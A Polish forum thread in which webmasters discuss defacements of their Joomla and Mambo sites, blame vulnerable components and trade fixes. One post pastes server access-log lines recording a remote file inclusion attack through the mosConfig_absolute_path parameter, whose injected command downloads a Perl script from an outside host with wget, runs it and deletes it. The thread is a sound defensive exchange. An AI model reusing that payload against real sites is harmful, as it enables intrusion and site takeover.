Joomla dziurawa jak durszlak :-/

[hazael]

Moj kumpel przyznał się jednak, ze tez ma community bulider - czyzby to nie joomla a ten komponent?

Sogo, Ty też masz ten komponent?

[sogo]

nie, nie mam, ale włamy u mnie polegały na czym innym, nic nie uszkodzono jedynie podmieniono po jednym pliku.
pozdr.

[hazael]

no u kumpla zrobili podobnie - podmienili kilka plików w ktorych zostawili notkę o sobie. W przypadku mojej witryny wyczyscili wszystko co bylo umieszcozne w folderach. Pliki w głownym katalogu pozostawili a częśc podmienili, aby zostawić swoj podpis.

Teraz dokladniej przyjrzalem sie komponentowi i chyba raczej trudno obwiniac community bulider. W fragmencie POST, który wyzej podałem:
/administrator/components/com_comprofiler/plugin.class.php

nie ma pliku plugin.class.php

A teraz poczytajcie sobie ciekawy artykuł:
http://hack.pl/aktualnosci/tureccy_hackerzy_podmieniaja_polskie_strony_intern etowe_102

[stone]

U mnie sytuacja indentyczna jak u Sogo. Z tym że to jest strona jeszcze na starym mambo, więc mnie to nie dziwi, a nie mam na razie czasu sobie aktualizacji zapodać, wieć bawimy się w kotka i myszkę z nadpisywaniem ;)

Prośba, podajęcie swoje konfiguracje. Wersja joomli + ważniejsze dodatki

[hazael]

ale dziwne, bo ja mam ostatnią wersje Joomla z wszelkimi mozliwymi latkami i tez mnie pieknie przeczyszczono...

Admin mowil mi, ze mialem zmasowany atak, duzo atakow bylo pod kontem PHPnuke - moją strone podobno meczyli 2 godziny..

[stone]

Ale jak sam stwierdziłeś włam poszedł bokiem przez CB, zobacz na joomlapl.com tam była chyba ostatnio lista dziurawych dodatków
A CB masz w najnowszej wersji?

[hazael]

tak, cały czas na bieżaco sledze joomlapolis i jak tylko cos sie pokazuje, to od razu podpiemiam. W kazdym razie wg tych zapytan polaczonych z moim komponentem nie ma czegos takiego jak plugin.class.php jak dobrze pamientam, to bylo cos takiego w starej wersji. Poza tym, moja strona jest calkowicie zamknieta ten komponent jest jedynie dostepny po zalogowaniu sie na stronoe a wszelkie linki sa maskowane przez OpenSef. No ale jak ktos chce to moze wszystko... :-/

Chociaż z drugiej strony wszystko wskazuje jednak na ten komponent CB - wnioskując z artykułu Dziurawe komponenty zamieszoznego na http://joomlapl.com/ - widac nie został on wzięty pod uwagę, mimo tego ma dziurę bo podobnie jak w poprzednich przypadkach napisanych w artykule do ataku wykorzystywana jest niepoprawna weryfikacja parametru "mosConfig_absolute_path przed wykonaniem funkcji include dla innych plików. na poczatku postu atak wyglada podonie., tez wykorzystuje mosConfig_absolute_path

[zwiastun]

Z wiedzą na ten temat u mnie słabiutko, ale może tu jakies wyjasnienie:

http://www.gajdaw.pl/varia/xss.html

[viper]

JA też się spotkałem z turkami na jednej z moich stron. Joomla 1.03 bez CB .Niżej log z ataku , podmieniono plik konfiguracyjny oraz pare innych plików.

201.244.38.14 - - [10/Jul/2006:02:57:48 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mischel.cz/testy/autotaps/Fotografie/Velke/tool.gif?&cmd=cd%20/tmp/;wget%20http://www.mischel.cz/testy/autotaps/Fotografie/Velke/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 200 2371 "-" "Mozilla/5.0"

201.244.38.14 - - [10/Jul/2006:14:04:25 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mischel.cz/testy/autotaps/Fotografie/Velke/tool.gif?&cmd=cd%20/tmp/;wget%20http://www.mischel.cz/testy/autotaps/Fotografie/Velke/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 200 2371 "-" "Mozilla/5.0"
201.244.38.14 - - [10/Jul/2006:14:04:33 +0200] "GET

201.244.38.14 - - [10/Jul/2006:14:29:03 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mischel.cz/testy/autotaps/Fotografie/Velke/tool.gif?&cmd=cd%20/tmp/;wget%20http://www.mischel.cz/testy/autotaps/Fotografie/Velke/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 200 2371 "-" "Mozilla/5.0"

201.244.38.14 - - [10/Jul/2006:17:30:08 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mischel.cz/testy/autotaps/Fotografie/Velke/tool.gif?&cmd=cd%20/tmp/;wget%20http://www.mischel.cz/testy/autotaps/Fotografie/Velke/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 200 2371 "-" "Mozilla/5.0"

Środek naprawczy wykasowanie wszystkiego i przywrócenie danych z kopi zapasowej.
Do pliku .htaccess dopisane

Deny from 201.244.38

w celu blokady tego IP
Po adresie www.mischel.cz wygląda to na czeskich turków

[vj_]

Ostatnio z takimi przypadkami sie spotkalem na postnuke, w wersji jak mnie pamiec nie myli 0.7.5 - byla generalnie globalna panika, ludzie musieli - powtarzam MUSIELI - przeskoczyc na 7.6.1 - sam przenosilem i pomagalem jednemu koledze znajomego resuscytowac dwa serwisy, postawione na rzeczonym cmsie, pracy bylo co nie miara, bo baza sporo wazyla, niby teoretycznie tylko pozmieniali wpisy w pliku konfiguracyjnym - zamiast pojawic sie witrynka byla jakas strona turecka z powitalnych "ju w bin hakd by cos tam turkisz", ale z przenoszeniem i aktualizacja byl problem, bo tam akurat moduly nie wszystkie pasuja do nowszej wersji. Tak czy siak, jedyna mozliwoscia obrony czasami jest ustawianie wpisow w plikach konfiguracyjnych na sztywno, bez sciezek dostepu w postaci zmiennych, ale to jest sporo pracy bo trzeba wtedy modyfikowac nie jeden plik, choc mysle ze moze sie to oplacic, jesli ktos nie przewiduje pozniejszej aktualizacji oprogramowania tylko mutowanie swojej wlasnej wersji cmsa, czy to joomla,mambo,nuke'owate cmsy i inne.